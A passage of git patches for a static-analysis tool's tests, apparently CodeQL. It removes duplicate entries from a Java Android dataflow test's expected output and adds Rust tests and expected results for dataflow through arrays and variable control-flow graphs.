Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | provenance | MaD:138 | -| Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | provenance | MaD:138 | | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | provenance | | -| Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | provenance | | -| Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | provenance | | | Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | provenance | | | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | Test.java:22:28:22:43 | container : Bundle [] : String | provenance | | | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | Test.java:1074:9:1074:38 | getMapValueDefault(...) | provenance | MaD:104 | @@ -1174,21 +1126,17 @@ nodes | Test.java:79:25:79:54 | newWithMapKeyDefault(...) : Bundle [] : String | semmle.label | newWithMapKeyDefault(...) : Bundle [] : String | | Test.java:79:46:79:53 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:80:4:80:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:80:18:80:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:81:9:81:41 | getMapKeyDefault(...) | semmle.label | getMapKeyDefault(...) | | Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:81:26:81:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:81:26:81:40 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:88:16:88:56 | (...)... : Bundle [] : String | semmle.label | (...)... : Bundle [] : String | | Test.java:88:25:88:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:88:48:88:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:89:4:89:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:89:18:89:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:90:9:90:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:90:28:90:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:90:28:90:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:95:37:95:74 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:95:67:95:74 | source(...) : Object | semmle.label | source(...) : Object | @@ -1204,15 +1152,11 @@ nodes | Test.java:112:25:112:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:112:48:112:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:113:4:113:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:113:22:113:23 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:114:10:114:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | semmle.label | build(...) : Action [android.content.Intent.extras, ] : String | | Test.java:114:10:114:24 | build(...) : Action [android.content.Intent.extras, ] : String | semmle.label | build(...) : Action [android.content.Intent.extras, ] : String | | Test.java:115:9:115:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | semmle.label | out : Action [android.content.Intent.extras, ] : String | -| Test.java:115:28:115:30 | out : Action [android.content.Intent.extras, ] : String | semmle.label | out : Action [android.content.Intent.extras, ] : String | | Test.java:115:28:115:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:120:37:120:74 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:120:67:120:74 | source(...) : Object | semmle.label | source(...) : Object | @@ -1278,21 +1222,17 @@ nodes | Test.java:206:25:206:54 | newWithMapKeyDefault(...) : Bundle [] : String | semmle.label | newWithMapKeyDefault(...) : Bundle [] : String | | Test.java:206:46:206:53 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:207:4:207:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:207:18:207:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:208:9:208:41 | getMapKeyDefault(...) | semmle.label | getMapKeyDefault(...) | | Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:208:26:208:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:208:26:208:40 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:214:16:214:56 | (...)... : Bundle [] : String | semmle.label | (...)... : Bundle [] : String | | Test.java:214:25:214:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:214:48:214:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:215:4:215:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:215:18:215:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:216:9:216:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:216:28:216:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:216:28:216:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:221:30:221:60 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:221:53:221:60 | source(...) : Object | semmle.label | source(...) : Object | @@ -1313,15 +1253,11 @@ nodes | Test.java:244:25:244:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:244:48:244:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:245:4:245:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:245:22:245:23 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:246:10:246:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | semmle.label | build(...) : Notification [extras, ] : String | | Test.java:246:10:246:24 | build(...) : Notification [extras, ] : String | semmle.label | build(...) : Notification [extras, ] : String | | Test.java:247:9:247:38 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:247:28:247:30 | out : Notification [extras, ] : String | semmle.label | out : Notification [extras, ] : String | -| Test.java:247:28:247:30 | out : Notification [extras, ] : String | semmle.label | out : Notification [extras, ] : String | | Test.java:247:28:247:37 | out.extras : Bundle [] : String | semmle.label | out.extras : Bundle [] : String | | Test.java:252:30:252:60 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:252:53:252:60 | source(...) : Object | semmle.label | source(...) : Object | @@ -1765,21 +1701,17 @@ nodes | Test.java:851:25:851:54 | newWithMapKeyDefault(...) : Bundle [] : String | semmle.label | newWithMapKeyDefault(...) : Bundle [] : String | | Test.java:851:46:851:53 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:852:4:852:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:852:18:852:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:853:9:853:41 | getMapKeyDefault(...) | semmle.label | getMapKeyDefault(...) | | Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:853:26:853:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:853:26:853:40 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:858:16:858:56 | (...)... : Bundle [] : String | semmle.label | (...)... : Bundle [] : String | | Test.java:858:25:858:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:858:48:858:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:859:4:859:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:859:18:859:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:860:9:860:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:860:28:860:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:860:28:860:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:865:43:865:86 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:865:79:865:86 | source(...) : Object | semmle.label | source(...) : Object | @@ -1790,15 +1722,11 @@ nodes | Test.java:873:25:873:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:873:48:873:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:874:4:874:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:874:22:874:23 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:875:10:875:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | semmle.label | build(...) : Action [android.content.Intent.extras, ] : String | | Test.java:875:10:875:24 | build(...) : Action [android.content.Intent.extras, ] : String | semmle.label | build(...) : Action [android.content.Intent.extras, ] : String | | Test.java:876:9:876:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | semmle.label | out : Action [android.content.Intent.extras, ] : String | -| Test.java:876:28:876:30 | out : Action [android.content.Intent.extras, ] : String | semmle.label | out : Action [android.content.Intent.extras, ] : String | | Test.java:876:28:876:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:881:43:881:86 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:881:79:881:86 | source(...) : Object | semmle.label | source(...) : Object | @@ -1919,21 +1847,17 @@ nodes | Test.java:1042:25:1042:54 | newWithMapKeyDefault(...) : Bundle [] : String | semmle.label | newWithMapKeyDefault(...) : Bundle [] : String | | Test.java:1042:46:1042:53 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:1043:4:1043:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:1043:18:1043:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:1044:9:1044:41 | getMapKeyDefault(...) | semmle.label | getMapKeyDefault(...) | | Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:1044:26:1044:28 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:1044:26:1044:40 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:1049:16:1049:56 | (...)... : Bundle [] : String | semmle.label | (...)... : Bundle [] : String | | Test.java:1049:25:1049:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:1049:48:1049:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:1050:4:1050:6 | out [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:1050:18:1050:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:1051:9:1051:43 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | -| Test.java:1051:28:1051:30 | out : Builder [android.content.Intent.extras, ] : String | semmle.label | out : Builder [android.content.Intent.extras, ] : String | | Test.java:1051:28:1051:42 | getExtras(...) : Bundle [] : String | semmle.label | getExtras(...) : Bundle [] : String | | Test.java:1056:36:1056:72 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:1056:65:1056:72 | source(...) : Object | semmle.label | source(...) : Object | @@ -1949,15 +1873,11 @@ nodes | Test.java:1071:25:1071:56 | newWithMapValueDefault(...) : Bundle [] : String | semmle.label | newWithMapValueDefault(...) : Bundle [] : String | | Test.java:1071:48:1071:55 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | -| Test.java:1072:4:1072:10 | builder [post update] : Builder [android.content.Intent.extras, ] : String | semmle.label | builder [post update] : Builder [android.content.Intent.extras, ] : String | | Test.java:1072:22:1072:23 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:1073:10:1073:16 | builder : Builder [android.content.Intent.extras, ] : String | semmle.label | builder : Builder [android.content.Intent.extras, ] : String | -| Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | semmle.label | build(...) : Notification [extras, ] : String | | Test.java:1073:10:1073:24 | build(...) : Notification [extras, ] : String | semmle.label | build(...) : Notification [extras, ] : String | | Test.java:1074:9:1074:38 | getMapValueDefault(...) | semmle.label | getMapValueDefault(...) | | Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | semmle.label | out : Notification [extras, ] : String | -| Test.java:1074:28:1074:30 | out : Notification [extras, ] : String | semmle.label | out : Notification [extras, ] : String | | Test.java:1074:28:1074:37 | out.extras : Bundle [] : String | semmle.label | out.extras : Bundle [] : String | | Test.java:1079:36:1079:72 | (...)... : Builder | semmle.label | (...)... : Builder | | Test.java:1079:65:1079:72 | source(...) : Object | semmle.label | source(...) : Object | From 3346b64e96b4cfb6657de80e8a6a299f771656e4 Mon Sep 17 00:00:00 2001 From: Simon Friis Vindum Date: Tue, 3 Dec 2024 13:44:49 +0100 Subject: [PATCH 0777/1267] Rust: Add variables and data flow array tests --- .../dataflow/local/DataFlowStep.expected | 53 ++- .../test/library-tests/dataflow/local/main.rs | 54 +++ .../test/library-tests/variables/Cfg.expected | 356 ++++++++++-------- .../test/library-tests/variables/Ssa.expected | 33 +- .../variables/variables.expected | 48 ++- .../test/library-tests/variables/variables.rs | 9 + 6 files changed, 367 insertions(+), 186 deletions(-) diff --git a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected index bc36656e49d..6828fdf9b7e 100644 --- a/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected +++ b/rust/ql/test/library-tests/dataflow/local/DataFlowStep.expected @@ -344,6 +344,57 @@ localStep | main.rs:306:22:306:22 | [SSA] n | main.rs:306:34:306:34 | n | | main.rs:306:22:306:22 | n | main.rs:306:22:306:22 | [SSA] n | | main.rs:306:29:306:35 | sink(...) | main.rs:304:5:307:5 | match s2 { ... } | +| main.rs:314:9:314:12 | [SSA] arr1 | main.rs:315:14:315:17 | arr1 | +| main.rs:314:9:314:12 | arr1 | main.rs:314:9:314:12 | [SSA] arr1 | +| main.rs:314:16:314:33 | [...] | main.rs:314:9:314:12 | arr1 | +| main.rs:315:9:315:10 | [SSA] n1 | main.rs:316:10:316:11 | n1 | +| main.rs:315:9:315:10 | n1 | main.rs:315:9:315:10 | [SSA] n1 | +| main.rs:315:14:315:20 | arr1[2] | main.rs:315:9:315:10 | n1 | +| main.rs:318:9:318:12 | [SSA] arr2 | main.rs:319:14:319:17 | arr2 | +| main.rs:318:9:318:12 | arr2 | main.rs:318:9:318:12 | [SSA] arr2 | +| main.rs:318:16:318:31 | [...] | main.rs:318:9:318:12 | arr2 | +| main.rs:319:9:319:10 | [SSA] n2 | main.rs:320:10:320:11 | n2 | +| main.rs:319:9:319:10 | n2 | main.rs:319:9:319:10 | [SSA] n2 | +| main.rs:319:14:319:20 | arr2[4] | main.rs:319:9:319:10 | n2 | +| main.rs:322:9:322:12 | [SSA] arr3 | main.rs:323:14:323:17 | arr3 | +| main.rs:322:9:322:12 | arr3 | main.rs:322:9:322:12 | [SSA] arr3 | +| main.rs:322:16:322:24 | [...] | main.rs:322:9:322:12 | arr3 | +| main.rs:323:9:323:10 | [SSA] n3 | main.rs:324:10:324:11 | n3 | +| main.rs:323:9:323:10 | n3 | main.rs:323:9:323:10 | [SSA] n3 | +| main.rs:323:14:323:20 | arr3[2] | main.rs:323:9:323:10 | n3 | +| main.rs:328:9:328:12 | [SSA] arr1 | main.rs:329:15:329:18 | arr1 | +| main.rs:328:9:328:12 | arr1 | main.rs:328:9:328:12 | [SSA] arr1 | +| main.rs:328:16:328:33 | [...] | main.rs:328:9:328:12 | arr1 | +| main.rs:329:9:329:10 | [SSA] n1 | main.rs:330:14:330:15 | n1 | +| main.rs:329:9:329:10 | n1 | main.rs:329:9:329:10 | [SSA] n1 | +| main.rs:333:9:333:12 | [SSA] arr2 | main.rs:334:15:334:18 | arr2 | +| main.rs:333:9:333:12 | arr2 | main.rs:333:9:333:12 | [SSA] arr2 | +| main.rs:333:16:333:24 | [...] | main.rs:333:9:333:12 | arr2 | +| main.rs:334:5:336:5 | for ... in ... { ... } | main.rs:327:21:337:1 | { ... } | +| main.rs:334:9:334:10 | [SSA] n2 | main.rs:335:14:335:15 | n2 | +| main.rs:334:9:334:10 | n2 | main.rs:334:9:334:10 | [SSA] n2 | +| main.rs:340:9:340:12 | [SSA] arr1 | main.rs:341:11:341:14 | arr1 | +| main.rs:340:9:340:12 | arr1 | main.rs:340:9:340:12 | [SSA] arr1 | +| main.rs:340:16:340:33 | [...] | main.rs:340:9:340:12 | arr1 | +| main.rs:341:5:347:5 | match arr1 { ... } | main.rs:339:26:348:1 | { ... } | +| main.rs:341:11:341:14 | arr1 | main.rs:342:9:342:17 | SlicePat | +| main.rs:342:10:342:10 | [SSA] a | main.rs:343:18:343:18 | a | +| main.rs:342:10:342:10 | a | main.rs:342:10:342:10 | [SSA] a | +| main.rs:342:13:342:13 | [SSA] b | main.rs:344:18:344:18 | b | +| main.rs:342:13:342:13 | b | main.rs:342:13:342:13 | [SSA] b | +| main.rs:342:16:342:16 | [SSA] c | main.rs:345:18:345:18 | c | +| main.rs:342:16:342:16 | c | main.rs:342:16:342:16 | [SSA] c | +| main.rs:342:22:346:9 | { ... } | main.rs:341:5:347:5 | match arr1 { ... } | +| main.rs:351:9:351:19 | [SSA] mut_arr | main.rs:352:10:352:16 | mut_arr | +| main.rs:351:9:351:19 | mut_arr | main.rs:351:9:351:19 | [SSA] mut_arr | +| main.rs:351:23:351:31 | [...] | main.rs:351:9:351:19 | mut_arr | +| main.rs:354:5:354:11 | [SSA] mut_arr | main.rs:355:13:355:19 | mut_arr | +| main.rs:354:5:354:11 | mut_arr | main.rs:354:5:354:11 | [SSA] mut_arr | +| main.rs:354:18:354:27 | source(...) | main.rs:354:5:354:14 | mut_arr[1] | +| main.rs:355:9:355:9 | [SSA] d | main.rs:356:10:356:10 | d | +| main.rs:355:9:355:9 | d | main.rs:355:9:355:9 | [SSA] d | +| main.rs:355:13:355:19 | mut_arr | main.rs:357:10:357:16 | mut_arr | +| main.rs:355:13:355:22 | mut_arr[1] | main.rs:355:9:355:9 | d | storeStep | main.rs:94:14:94:22 | source(...) | tuple.0 | main.rs:94:13:94:26 | TupleExpr | | main.rs:94:25:94:25 | 2 | tuple.1 | main.rs:94:13:94:26 | TupleExpr | @@ -385,7 +436,7 @@ storeStep | main.rs:276:41:276:41 | 2 | D | main.rs:276:14:276:43 | ...::D {...} | | main.rs:294:18:294:27 | source(...) | C | main.rs:293:14:295:5 | C {...} | | main.rs:296:27:296:27 | 2 | D | main.rs:296:14:296:29 | D {...} | -| main.rs:314:27:314:27 | 0 | Some | main.rs:314:22:314:28 | Some(...) | +| main.rs:364:27:364:27 | 0 | Some | main.rs:364:22:364:28 | Some(...) | readStep | file://:0:0:0:0 | [summary param] self in lang:core::_::::unwrap | Some | file://:0:0:0:0 | [summary] read: Argument[self].Variant[crate::option::Option::Some(0)] in lang:core::_::::unwrap | | main.rs:33:9:33:15 | TupleStructPat | Some | main.rs:33:14:33:14 | _ | diff --git a/rust/ql/test/library-tests/dataflow/local/main.rs b/rust/ql/test/library-tests/dataflow/local/main.rs index 2732e00ecb1..05e0997e6ea 100644 --- a/rust/ql/test/library-tests/dataflow/local/main.rs +++ b/rust/ql/test/library-tests/dataflow/local/main.rs @@ -307,6 +307,56 @@ fn custom_record_enum_pattern_match_unqualified() { } } +// ----------------------------------------------------------------------------- +// Data flow through arrays + +fn array_lookup() { + let arr1 = [1, 2, source(94)]; + let n1 = arr1[2]; + sink(n1); // $ MISSING: hasValueFlow=94 + + let arr2 = [source(20); 10]; + let n2 = arr2[4]; + sink(n2); // $ MISSING: hasValueFlow=20 + + let arr3 = [1, 2, 3]; + let n3 = arr3[2]; + sink(n3); +} + +fn array_for_loop() { + let arr1 = [1, 2, source(43)]; + for n1 in arr1 { + sink(n1); // $ MISSING: hasValueFlow=43 + } + + let arr2 = [1, 2, 3]; + for n2 in arr2 { + sink(n2); + } +} + +fn array_slice_pattern() { + let arr1 = [1, 2, source(43)]; + match arr1 { + [a, b, c] => { + sink(a); + sink(b); + sink(c); // $ MISSING: hasValueFlow=43 + } + } +} + +fn array_assignment() { + let mut mut_arr = [1, 2, 3]; + sink(mut_arr[1]); + + mut_arr[1] = source(55); + let d = mut_arr[1]; + sink(d); // $ MISSING: hasValueFlow=55 + sink(mut_arr[0]); +} + fn main() { direct(); variable_usage(); @@ -334,4 +384,8 @@ fn main() { block_expression1(); block_expression2(true); block_expression3(true); + array_lookup(); + array_for_loop(); + array_slice_pattern(); + array_assignment(); } diff --git a/rust/ql/test/library-tests/variables/Cfg.expected b/rust/ql/test/library-tests/variables/Cfg.expected index 6b979eac0da..a86cca703bb 100644 --- a/rust/ql/test/library-tests/variables/Cfg.expected +++ b/rust/ql/test/library-tests/variables/Cfg.expected @@ -1116,163 +1116,203 @@ edges | variables.rs:497:5:497:26 | ExprStmt | variables.rs:497:5:497:13 | print_i64 | | | variables.rs:497:15:497:15 | a | variables.rs:497:15:497:24 | ... .my_get(...) | | | variables.rs:497:15:497:24 | ... .my_get(...) | variables.rs:497:5:497:25 | print_i64(...) | | -| variables.rs:500:1:507:1 | enter fn ref_arg | variables.rs:501:5:501:15 | let ... = 16 | | -| variables.rs:500:1:507:1 | exit fn ref_arg (normal) | variables.rs:500:1:507:1 | exit fn ref_arg | | -| variables.rs:500:14:507:1 | { ... } | variables.rs:500:1:507:1 | exit fn ref_arg (normal) | | -| variables.rs:501:5:501:15 | let ... = 16 | variables.rs:501:13:501:14 | 16 | | -| variables.rs:501:9:501:9 | x | variables.rs:502:5:502:22 | ExprStmt | match | -| variables.rs:501:13:501:14 | 16 | variables.rs:501:9:501:9 | x | | -| variables.rs:502:5:502:17 | print_i64_ref | variables.rs:502:20:502:20 | x | | -| variables.rs:502:5:502:21 | print_i64_ref(...) | variables.rs:503:5:503:17 | ExprStmt | | -| variables.rs:502:5:502:22 | ExprStmt | variables.rs:502:5:502:17 | print_i64_ref | | -| variables.rs:502:19:502:20 | &x | variables.rs:502:5:502:21 | print_i64_ref(...) | | -| variables.rs:502:20:502:20 | x | variables.rs:502:19:502:20 | &x | | -| variables.rs:503:5:503:13 | print_i64 | variables.rs:503:15:503:15 | x | | -| variables.rs:503:5:503:16 | print_i64(...) | variables.rs:505:5:505:15 | let ... = 17 | | -| variables.rs:503:5:503:17 | ExprStmt | variables.rs:503:5:503:13 | print_i64 | | -| variables.rs:503:15:503:15 | x | variables.rs:503:5:503:16 | print_i64(...) | | -| variables.rs:505:5:505:15 | let ... = 17 | variables.rs:505:13:505:14 | 17 | | -| variables.rs:505:9:505:9 | z | variables.rs:506:5:506:22 | ExprStmt | match | -| variables.rs:505:13:505:14 | 17 | variables.rs:505:9:505:9 | z | | -| variables.rs:506:5:506:17 | print_i64_ref | variables.rs:506:20:506:20 | z | | -| variables.rs:506:5:506:21 | print_i64_ref(...) | variables.rs:500:14:507:1 | { ... } | | -| variables.rs:506:5:506:22 | ExprStmt | variables.rs:506:5:506:17 | print_i64_ref | | -| variables.rs:506:19:506:20 | &z | variables.rs:506:5:506:21 | print_i64_ref(...) | | -| variables.rs:506:20:506:20 | z | variables.rs:506:19:506:20 | &z | | -| variables.rs:514:3:516:3 | enter fn bar | variables.rs:514:15:514:18 | self | | -| variables.rs:514:3:516:3 | exit fn bar (normal) | variables.rs:514:3:516:3 | exit fn bar | | -| variables.rs:514:10:514:18 | SelfParam | variables.rs:515:5:515:32 | ExprStmt | | -| variables.rs:514:15:514:18 | self | variables.rs:514:10:514:18 | SelfParam | | -| variables.rs:514:21:516:3 | { ... } | variables.rs:514:3:516:3 | exit fn bar (normal) | | -| variables.rs:515:5:515:9 | * ... | variables.rs:515:29:515:29 | 3 | | -| variables.rs:515:5:515:31 | ... = ... | variables.rs:514:21:516:3 | { ... } | | -| variables.rs:515:5:515:32 | ExprStmt | variables.rs:515:6:515:9 | self | | -| variables.rs:515:6:515:9 | self | variables.rs:515:5:515:9 | * ... | | -| variables.rs:515:13:515:31 | MyStruct {...} | variables.rs:515:5:515:31 | ... = ... | | -| variables.rs:515:29:515:29 | 3 | variables.rs:515:13:515:31 | MyStruct {...} | | -| variables.rs:519:1:524:1 | enter fn ref_methodcall_receiver | variables.rs:520:3:520:34 | let ... = ... | | -| variables.rs:519:1:524:1 | exit fn ref_methodcall_receiver (normal) | variables.rs:519:1:524:1 | exit fn ref_methodcall_receiver | | -| variables.rs:519:30:524:1 | { ... } | variables.rs:519:1:524:1 | exit fn ref_methodcall_receiver (normal) | | -| variables.rs:520:3:520:34 | let ... = ... | variables.rs:520:31:520:31 | 1 | | -| variables.rs:520:7:520:11 | a | variables.rs:521:3:521:10 | ExprStmt | 